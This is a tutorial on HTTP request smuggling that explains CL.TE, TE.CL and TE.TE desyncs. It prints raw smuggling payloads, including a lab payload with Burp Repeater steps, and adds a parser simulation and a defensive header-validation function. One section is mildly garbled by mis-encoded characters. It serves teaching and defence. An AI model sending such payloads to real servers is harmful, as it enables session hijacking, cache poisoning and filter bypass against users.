All Vulnerabilities For VAPT (Ethical Hacking)

Advanced Topics

HTTP REQUEST SMUGGLING 

HTTP REQUEST SMUGGLING ATTACKS

1.1 WHAT IS HTTP REQUEST SMUGGLING?

HTTP Request Smuggling happens when:
● There are two servers in the path (front-end + back-end)
● They disagree about where one HTTP request ends and the next one begins
● Because of that, you can hide one request inside another

The hidden request is called the smuggled request.

1.2 WHY TWO SERVERS EXIST

Most real websites look like this:

You → Front-end (reverse proxy / load balancer / WAF) → Back-end (app)

Front-end server
● Blocks bad stuff
● Allows only GET / POST
● Forwards requests to the back-end, usually over a single reused TCP connection

Back-end server
● Runs the app
● Talks to the DB
● Trusts the front-end

That reused connection is what makes smuggling possible: bytes the back-end leaves unconsumed from one request become the start of the next request on the same connection, and that next request may belong to another user.

1.3 THE CORE PROBLEM

In HTTP/1.1 there are TWO ways to say where the request body ends:

1️⃣ Content-Length: 10 ➡ read exactly 10 bytes
2️⃣ Transfer-Encoding: chunked ➡ read hex-sized chunks until a chunk of size 0

The spec (RFC 7230, now RFC 9112) says Transfer-Encoding wins when both are present and that such a request ought to be treated as an error. Real servers do not all follow that.

THE BUG

If:
● Front-end trusts Content-Length
● Back-end trusts Transfer-Encoding
OR vice versa...

➡ They desync
➡ The extra data becomes the start of a new request on the back-end
➡ You win

1.4 TYPES OF HTTP REQUEST SMUGGLING

There are 3 main types.

1️⃣ **CL.TE (Content-Length vs Transfer-Encoding)**

Who trusts what
● Front-end → Content-Length
● Back-end → Transfer-Encoding

PAYLOAD (CL.TE)

POST / HTTP/1.1
Host: target.com
Content-Length: 10
Transfer-Encoding: chunked

0

GPOST

WHAT HAPPENS (every line break in the payload is CRLF, so the 10 body bytes are 0\r\n\r\nGPOST)

Front-end:
● Reads exactly 10 bytes of body
● Thinks the request is finished
● Forwards everything, GPOST included

Back-end:
● Sees Transfer-Encoding: chunked
● Sees the 0 chunk → body finished
● GPOST is left in the connection buffer and becomes the start of the next request, so the next request (possibly another user's) is parsed as something like GPOSTGET / HTTP/1.1 and rejected as an unrecognised method

Smuggling done

2️⃣ **TE.CL (Transfer-Encoding vs Content-Length)**

Who trusts what
● Front-end → Transfer-Encoding
● Back-end → Content-Length

PAYLOAD (TE.CL)

POST / HTTP/1.1
Host: target.com
Content-Length: 3
Transfer-Encoding: chunked

8
GPOST123
0

๐Ÿซ WHAT HAPPENS Front-end: ● Reads chunked body ● Stops at 0 Back-end: ● Reads only 3 bytes (GPO) ● Remaining data becomes new request ๐Ÿ”ฅ Smuggling done 3️⃣ **TE.TE (Duplicate Transfer-Encoding)** This is the advanced one. WHY TE.TE WORKS You send two Transfer-Encoding headers. Each server picks a different one. ๐Ÿงพ FULL PAYLOAD (TE.TE LAB)

POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked
Transfer-Encoding: cow

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

⚠️ Send this TWICE (in Burp Repeater, turn off automatic Content-Length updating first, or the 4 gets "fixed" for you)

FRONT-END THINKING
● Sees the first Transfer-Encoding: chunked and frames the body as chunked
● Reads chunk size 5c (hex) = 92 bytes, then the 0 chunk → end of body
● Forwards EVERYTHING to the back-end

BACK-END THINKING
● Sees Transfer-Encoding: cow, an encoding it does not understand
● Gives up on chunked and falls back to Content-Length: 4
● Reads only 4 bytes of body: 5c\r\n
● Everything after that is still sitting in its buffer:

GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

A FULL REQUEST GOT HIDDEN

(Which server falls for the obfuscation depends on the target. If it were the front-end that fell back to Content-Length, the roles would be swapped and you would build the payload the CL.TE way instead.)

WHAT IS x=1?
● Dummy POST data so the smuggled request has a body
● Content-Length: 15 is deliberately longer than x=1: the back-end keeps reading through the trailing 0 line and into the first bytes of the next request, so that request is glued onto the smuggled one

WHAT IS 0?
● End of the chunked body as seen by the front-end
● REQUIRED, and it must be followed by an empty line

WHY 5c?
● 5c hex = 92 bytes
● Exactly the length of the smuggled request from GPOST up to and including x=1, counting the CRLF line endings
● If you change the smuggled request, recount and update the hex size; a wrong size breaks the chunked parse at the front-end

WHY SEND THE REQUEST TWICE?
● First request → leaves the smuggled request sitting in the back-end buffer
● Second request → is appended to it; the back-end answers GPOST ... with "Unrecognized method GPOST", and that response comes back to the second request

1.5 REAL-WORLD IMPACT

HTTP Request Smuggling can lead to:
● Account Takeover
● Session hijacking (capturing other users' requests, cookies included)
● Cache poisoning
● Admin access (reaching back-end endpoints the front-end blocks)
● WAF bypass

Severity: CRITICAL
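To see the three desyncs mechanically instead of counting bytes by hand, here is an added simulation (not code from the original page and not PortSwigger's): it splits one byte stream under two framing policies and reports what each side sees, what stays in the back-end buffer, and what a following victim request turns into. The policies 'cl', 'te' and 'te-last', the desync() helper and the victim request are my assumptions that model the three scenarios above; real servers differ in detail. The chunk() helper also shows where the 5c in the TE.TE lab payload comes from.

```python
"""Apply two HTTP/1.1 framing policies to one byte stream and compare."""
from typing import Dict, List, Tuple

# Constructed request from another user that hits the back-end next on the same connection.
VICTIM = b"GET / HTTP/1.1\r\nHost: target.com\r\n\r\n"


def _framing(headers: List[Tuple[str, str]], policy: str):
    """Return 'chunked' or the number of body bytes the server will read.
    Simplified models of the page's scenarios, not any real product:
      'cl'      -> Content-Length wins whenever present
      'te'      -> first Transfer-Encoding header wins if it is 'chunked'
      'te-last' -> only the last Transfer-Encoding header counts; an unknown
                   value such as 'cow' means fall back to Content-Length"""
    te = [v.lower() for k, v in headers if k == "transfer-encoding"]
    cl = [int(v) for k, v in headers if k == "content-length"]
    if policy == "te":
        chunked = bool(te) and te[0] == "chunked"
    elif policy == "te-last":
        chunked = bool(te) and te[-1] == "chunked"
    else:
        chunked = bool(te) and te[0] == "chunked" and not cl
    return "chunked" if chunked else (cl[0] if cl else 0)


def _chunked_end(stream: bytes, pos: int) -> int:
    """Walk chunk-size lines to the 0 chunk; return the offset just after it."""
    while True:
        nl = stream.index(b"\r\n", pos)
        size = int(stream[pos:nl].split(b";")[0], 16)   # drop chunk extensions
        pos = nl + 2
        if size == 0:
            return stream.index(b"\r\n", pos) + 2       # empty trailer section
        pos += size + 2                                 # data plus its CRLF


def split_stream(stream: bytes, policy: str) -> Tuple[List[Tuple[str, bytes]], bytes]:
    """Split a byte stream into (request_line, body) pairs the way a server
    using `policy` would, and return the bytes still waiting in its buffer."""
    requests, pos = [], 0
    while True:
        end = stream.find(b"\r\n\r\n", pos)
        if end == -1:                                   # no full header block yet
            return requests, stream[pos:]
        lines = stream[pos:end].decode("latin-1").split("\r\n")
        headers = [(n.strip().lower(), v.strip())
                   for n, _, v in (line.partition(":") for line in lines[1:])]
        body_start = end + 4
        framing = _framing(headers, policy)
        try:
            body_end = (_chunked_end(stream, body_start) if framing == "chunked"
                        else body_start + framing)
        except ValueError:                              # chunk stream incomplete
            return requests, stream[pos:]
        if body_end > len(stream):                      # Content-Length wants more
            return requests, stream[pos:]
        requests.append((lines[0], stream[body_start:body_end]))
        pos = body_end


def chunk(data: bytes) -> bytes:
    """Encode one chunk: hex size line, data, CRLF (92 bytes gives b'5c')."""
    return b"%x\r\n%s\r\n" % (len(data), data)


def desync(stream: bytes, front: str, back: str, victim: bytes = VICTIM) -> Dict:
    """What each server sees, what stays in the back-end buffer, and what the
    victim's request turns into once it lands behind those leftover bytes."""
    front_reqs, _ = split_stream(stream, front)
    back_reqs, leftover = split_stream(stream, back)
    merged, _ = split_stream(leftover + victim, back)
    return {"front": [r for r, _ in front_reqs],
            "back": [r for r, _ in back_reqs],
            "leftover": leftover,
            "victim_becomes": merged[0][0] if merged else None}


# The page's three payloads as byte streams (CRLF line endings matter).
CL_TE = (b"POST / HTTP/1.1\r\nHost: target.com\r\n"
         b"Content-Length: 10\r\nTransfer-Encoding: chunked\r\n\r\n"
         b"0\r\n\r\nGPOST")
TE_CL = (b"POST / HTTP/1.1\r\nHost: target.com\r\n"
         b"Content-Length: 3\r\nTransfer-Encoding: chunked\r\n\r\n"
         b"8\r\nGPOST123\r\n0\r\n\r\n")
SMUGGLED = (b"GPOST / HTTP/1.1\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n"
            b"Content-Length: 15\r\n\r\nx=1")
TE_TE = (b"POST / HTTP/1.1\r\nHost: target.com\r\n"
         b"Content-Type: application/x-www-form-urlencoded\r\n"
         b"Content-Length: 4\r\n"
         b"Transfer-Encoding: chunked\r\nTransfer-Encoding: cow\r\n\r\n"
         + chunk(SMUGGLED) + b"0\r\n\r\n")

if __name__ == "__main__":
    for name, stream, front, back in (("CL.TE", CL_TE, "cl", "te"),
                                      ("TE.CL", TE_CL, "te", "cl"),
                                      ("TE.TE", TE_TE, "te", "te-last")):
        print(name, desync(stream, front, back))
```

Running it shows the three signatures: for CL.TE the back-end is left holding GPOST and the victim's request line becomes GPOSTGET / HTTP/1.1; for TE.CL the front-end counts one request while the back-end counts two; for TE.TE the back-end stalls with the whole GPOST request in its buffer waiting for 15 body bytes, and the victim's request is absorbed into it.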

Quick Summary — What HTTP Request Smuggling Is

HTTP request smuggling is a web security vulnerability that exploits differences in how front-end (proxy/WAF) and back-end servers parse HTTP requests — especially when Content-Length and Transfer-Encoding headers coexist.

If these two servers don’t agree on where one request ends and the next begins, an attacker can sneak (“smuggle”) a hidden HTTP request inside the next request.


Why It Happens (Technical Cause)

The core issue arises because HTTP/1.1 allows two different ways to determine the end of the body:

  • Content-Length: declares exact bytes.

  • Transfer-Encoding: chunked: sends chunks until a zero-size chunk.

If one server trusts one header and another trusts the other, they desynchronize — creating ambiguity.


Popular Attack Types

  1. CL.TE – Front-end uses Content-Length, back-end uses Transfer-Encoding.

  2. TE.CL – Front-end uses Transfer-Encoding, back-end uses Content-Length.

  3. TE.TE – Both servers support Transfer-Encoding, but one of them is tricked into ignoring it (and falling back to Content-Length) by duplicating or obfuscating the header.


Real-World Impacts

HTTP request smuggling can enable:

  • Session hijacking

  • Bypassing security filters (WAF/proxies)

  • Cache poisoning

  • Unauthorized admin access

  • Account takeovers
    (Critical severity in most cases)


How To Defend Against It

General prevention strategies include:

  • Make the front-end and back-end frame requests the same way: the same HTTP parser where possible, and a front-end that normalises the request (one framing header, exact byte count) before forwarding instead of relaying the original bytes.

  • Use HTTP/2 end-to-end. HTTP/2 frames carry their own length, so the Content-Length / Transfer-Encoding ambiguity disappears; a front-end that speaks HTTP/2 to clients but downgrades to HTTP/1.1 for the back-end reintroduces it.

  • Reject malformed or ambiguous requests at the edge: both Content-Length and Transfer-Encoding present, duplicate Transfer-Encoding, transfer-codings other than chunked, conflicting Content-Length values, whitespace or other non-token characters in header names.

  • Disable unnecessary legacy parsing features if possible (line folding, lenient header parsing), and if the back-end connection cannot be trusted to stay in sync, stop reusing it between requests; that costs performance but removes the attacker's foothold.
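The "reject ambiguous requests at the edge" item is the cheapest one to implement and the easiest to get subtly wrong, so here is an added example (not from the original page) of the framing check a front-end could run on the raw header list before forwarding. The rules follow RFC 9112 sections 6.1 and 6.3; the check is stricter than the RFC minimum in one place (a comma-separated Content-Length list is rejected rather than collapsed). The function name framing_verdict and the sample header sets are my own constructions.

```python
"""Strict body-framing check an edge proxy can run before forwarding a request.

Rules follow RFC 9112 sections 6.1 and 6.3 (formerly RFC 7230 section 3.3.3).
"""
import re
from typing import List, Tuple, Union

# RFC 9110 'token' characters: the only thing allowed in a header name.
_TOKEN = re.compile(r"^[!#$%&'*+.^_`|~0-9A-Za-z-]+$")

Verdict = Tuple[str, Union[str, int]]


def framing_verdict(raw_headers: List[Tuple[str, str]]) -> Verdict:
    """Return ('accept', 'chunked' | body_length) or ('reject', reason).

    raw_headers are (name, value) pairs exactly as they came off the wire,
    so whitespace tricks in the name are still visible here.
    """
    # 1. A name that is not a clean token ("Transfer-Encoding " with a space
    #    before the colon, for instance) is a parser-differential signal.
    for name, _ in raw_headers:
        if not _TOKEN.match(name):
            return "reject", "malformed header name %r" % name

    te = [v.strip() for n, v in raw_headers if n.lower() == "transfer-encoding"]
    cl = [v.strip() for n, v in raw_headers if n.lower() == "content-length"]

    # 2. Both framing mechanisms present: the classic CL.TE / TE.CL set-up.
    if te and cl:
        return "reject", "both Transfer-Encoding and Content-Length present"

    # 3. Transfer-Encoding: exactly one header, exactly 'chunked'.
    if te:
        if len(te) > 1:
            return "reject", "duplicate Transfer-Encoding headers"
        codings = [c.strip().lower() for c in te[0].split(",")]
        if codings != ["chunked"]:
            # 'cow', 'xchunked', 'gzip, chunked': only plain chunked is allowed
            return "reject", "unsupported transfer-coding %r" % te[0]
        return "accept", "chunked"

    # 4. Content-Length: duplicates allowed only if identical, ASCII digits only.
    if cl:
        if len(set(cl)) > 1:
            return "reject", "conflicting Content-Length values %r" % cl
        if not re.fullmatch(r"[0-9]+", cl[0]):
            return "reject", "non-numeric Content-Length %r" % cl[0]
        return "accept", int(cl[0])

    # 5. Neither header: no body.
    return "accept", 0


# Constructed header sets: the page's payloads plus benign requests.
SAMPLES = {
    "benign POST": [("Host", "target.com"), ("Content-Length", "3")],
    "benign chunked": [("Host", "target.com"), ("Transfer-Encoding", "chunked")],
    "CL.TE / TE.CL": [("Content-Length", "10"), ("Transfer-Encoding", "chunked")],
    "TE.TE cow": [("Transfer-Encoding", "chunked"), ("Transfer-Encoding", "cow")],
    "xchunked": [("Transfer-Encoding", "xchunked")],
    "space before colon": [("Transfer-Encoding ", "chunked")],
    "conflicting CL": [("Content-Length", "5"), ("Content-Length", "6")],
}

if __name__ == "__main__":
    for label, headers in SAMPLES.items():
        print("%-20s %s" % (label, framing_verdict(headers)))
```

Note the order of the checks: the token test runs before the header names are lower-cased and compared, because once names are normalised the obfuscation that made two parsers disagree is no longer visible. Whatever this function rejects should be answered with a 400 and the client connection closed, never forwarded with a "best guess" framing.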

